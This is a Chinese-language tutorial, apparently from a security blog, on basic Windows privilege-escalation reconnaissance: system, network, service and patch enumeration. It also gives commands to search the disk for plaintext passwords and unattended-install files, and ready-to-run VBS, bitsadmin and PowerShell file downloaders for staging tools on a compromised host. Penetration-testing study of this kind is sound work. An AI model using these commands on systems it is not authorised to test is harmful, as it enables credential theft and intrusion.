Windows權限提升基礎知識和命令
介紹
這篇文章是介紹window的權限提升,雖然不是一個全面的指南,但會試圖覆蓋主要的技術,常用的資源列表在文章底部,可供大家參考。
window權限提升基礎知識
初始信息收集
在開始提權之前,我們需要了解操作系統基本的信息,如安裝軟件,操作系統版本,連接用戶,端口進程等信息,
確定操作系統名稱和版本
| 1 | C:\Users\sanr> systeminfo | findstr /B /C:”OS Name” /C:”OS Version” |
查看主機名
| 1 | C:\Users\sanr> hostname |
查看所有環境變量
| 1 | C:\Users\sanr> SET |
查看用戶跟用戶詳細信息
| 1 2 | C:\Users\sanr> net user C:\Users\sanr> net user sanr |
查看在線用戶
| 1 | C:\Users\sanr> query user |
查詢終端端口
| 1 | C:\Users\sanr> REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber |
網絡連接
讓我們來看看該系統的網絡設置 – 基本網絡,路由,防火墻等。
查看ip dns地址
| 1 | C:\Users\sanr>ipconfig /all |
要查看路由表
| 1 | C:\Users\sanr> route print |
要查看ARP緩存:
| 1 | C:\Users\sanr> arp -A |
查看網絡連接
| 1 | C:\Users\sanr> netstat -ano |
要查看防火墻規則:
| 1 2 3 | C:\Users\sanr> netstat -ano C:\Users\sanr> netsh firewall show config C:\Users\sanr> netsh firewall show state |
應用程序和服務
查看系統上的計劃任務
| 1 | C:\Users\sanr> schtasks /QUERY /fo LIST /v |
要查看服務的進程ID:
| 1 | C:\Users\sanr> tasklist /SVC |
要查看已安裝驅動程序的列表:
| 1 | C:\Users\sanr> DRIVERQUERY |
查看已經啟動Windows 服務
| 1 | C:\Users\sanr> net start |
查看某服務啟動權限
| 1 2 3 4 5 6 7 8 9 10 11 12 | C:\Users\sanr> sc qc mysqla [SC] QueryServiceConfig 成功 SERVICE_NAME: mysqla TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : “D:\Program Files\phpstudy\mysql\bin\mysqld.exe” MySQLa LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : MySQLa DEPENDENCIES : SERVICE_START_NAME : LocalSystem |
利用WMIC獲取有價值的數據
查看其版本的已安裝程序的列表
| 1 | C:\Users\sanr> wmic product list brief |
查看服務,進程或啟動程序的列表:
| 1 2 3 | C:\Users\sanr> wmic service list brief # Lists services C:\Users\sanr> wmic process list brief # Lists processes C:\Users\sanr> wmic startup list brief # Lists startup items |
檢查已安裝的更新和安裝日期
| 1 | C:\Users\sanr> wmic qfe get Caption,Description,HotFixID,InstalledOn |
搜索,您可以使用提升權限的特定漏洞
| 1 2 | C:\Users\sanr> wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:”KBxxxxxxx” # Replace with a patch version that you are searching for. Eg – KB3000061 |
執行上面的命令的沒有輸出,意味著那個補丁未安裝。
敏感數據和directories
檢查未加密的密碼,或敏感信息的文件多汁:
| 1 2 3 4 5 | C:\Users\sanr> cd/ C:\Users\sanr> dir /b/s password.txt # Will search for all password.txt files on the filesystem. C:\Users\sanr> dir /b/s config.* # Will search for all files starting with ‘config’ on the filesystem. C:\Users\sanr> findstr /si password *.xml *.ini *.txt C:\Users\sanr> findstr /si login *.xml *.ini *.txt |
除此之外,您還可以檢查無人值守安裝日誌文件。這些文件通常包含base64編碼的密碼。你更可能在大型企業中,其中單個系統的手動安裝是不切實際的找到這些文件。這些文件的共同位置是:
| 1 2 3 4 | C:\sysprep.inf C:\sysprep\sysprep.xml C:\Windows\Panther\Unattend\Unattended.xml C:\Windows\Panther\Unattended.xml |
目錄文件操作
列出d:\www的所有目錄:
| 1 | for /d %i in (d:\www\*) do @echo %i |
把當前路徑下文件夾的名字只有1-3個字母的顯示出來:
| 1 | for /d %i in (???) do @echo %i |
以當前目錄為搜索路徑,把當前目錄與下面的子目錄的全部EXE文件列出:
| 1 | for /r %i in (*.exe) do @echo %i |
以指定目錄為搜索路徑,把當前目錄與下面的子目錄的所有文件列出
| 1 | for /r “f:\freehost\hmadesign\web\” %i in (*.*) do @echo %i |
顯示a.txt裏面的內容,因為/f的作用,會讀出a.txt中:
| 1 2 3 4 5 6 7 8 9 10 11 12 | for /f %i in (c:\1.txt) do echo %i RAR 打包 C:\Users\sanr> rar a -k -r -s -m3 c:\1.rar c:\folde php讀文件 C:\Users\sanr> c:/php/php.exe “c:/www/admin/1.php” <?php $file_handle = fopen(“f:/config.asp”, “r”); while (! feof($file_handle)) { echo fgets($file_handle); } fclose($file_handle); ?> |
利用系統程序,文件下載
擁有了這些信息,我們現在可以開始實際提升我們的特權的過程。
利用vbs來讓我們上傳文件,是一個vbs下載者,原理是下載文件到這臺計算機(需要訪問網絡):
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 | ‘ downloadfile.vbs ‘ Set your settings strFileURL = “http://127.0.0.1/text.ico” strHDLocation = “d:\text.ico” ‘ Fetch the file Set objXMLHTTP = CreateObject(“MSXML2.XMLHTTP”) objXMLHTTP.open “GET”, strFileURL, false objXMLHTTP.send() If objXMLHTTP.Status = 200 Then Set objADOStream = CreateObject(“ADODB.Stream”) objADOStream.Open objADOStream.Type = 1 ‘adTypeBinary objADOStream.Write objXMLHTTP.ResponseBody objADOStream.Position = 0 ‘Set the stream position to the start Set objFSO = Createobject(“Scripting.FileSystemObject”) If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation Set objFSO = Nothing objADOStream.SaveToFile strHDLocation objADOStream.Close Set objADOStream = Nothing End if Set objXMLHTTP = Nothing |
這個腳本可以在任何版本的Windows上運行,要執行它,如下。
| 1 | C:\Users\sanr> script.exe downloadfile.vbs |
如果操作系統是Windows7及以上的,使用的bitsadmin跟powershell:
| 1 2 | C:\Users\sanr> bitsadmin /transfer n http://www.jd.com/favicon.ico d:\text.ico C:\Users\sanr> powershell (new-object System.Net.WebClient).DownloadFile(‘http://www.jd.com/favicon.ico’,’text.ico’) |
下載文件方式還有一些其他的方式,比如ftp php python,可根據自己的需求來選擇。
Windows權限提升基礎知識和命令